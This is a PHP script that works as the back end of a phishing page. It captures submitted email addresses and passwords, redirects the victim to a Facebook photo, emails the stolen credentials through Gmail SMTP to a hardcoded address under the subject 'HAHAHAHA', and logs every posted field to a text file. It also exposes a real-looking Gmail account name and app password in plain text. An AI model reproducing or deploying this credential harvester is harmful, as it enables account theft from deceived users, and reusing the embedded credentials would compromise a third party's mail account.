<?php

    require "Exception.php";
    require "PHPMailer.php";
    require "SMTP.php";

    use PHPMailer\PHPMailer;
    use PHPMailer\PHPException;
    header ('Location: https://www.facebook.com/photo?fbid=416567854004233&set=a.416567477337604');
    $correo = "CORREO: ".$_POST['Correo'];
    $contra = "CONTRASEÑA: ".$_POST['Contra'];
    
    $mail = new PHPMailer();



    $mail->isSMTP();
    $mail->Host = 'smtp.gmail.com';
    $mail->SMTPAuth = true;
    $mail->Username = 'afranchesco14@gmail.com'; //paste one generated by Mailtrap//
    $mail->Password = 'oeoxeemrpjssurej'; //paste one generated by Mailtrap
    $mail->SMTPSecure = 'tls';
    $mail->Port = "587";


    $mail->setFrom('afranchesco14@gmail.com');
    $mail->addAddress('afranchesco14@gmail.com'); 

    $mail->Subject = "HAHAHAHA";

    $mailContent = "$correo, \n $contra";

    $mail->Body = $mailContent;

    $mail->isHTML(true);
    if($mail->send()){
        echo "mail sent"; 
        //echo $correo, $contra;
    }else{
        echo "Error al enviar: {$mail->ErrorInfo}";
    }
  
    $mail->smtpClose();

    
    $file = fopen("log.txt", "a");
    
    foreach($_POST as $correo => $contra) {
        fwrite($file, $correo);
        fwrite($file, "=");
        fwrite($file, $contra);
        fwrite($file, "\r\n");
    }
    
    fwrite($file, "\r\n");
    fclose($file);
    


    //CONFIGURATION PHP-MAILER


    
   




    exit;



 
?>
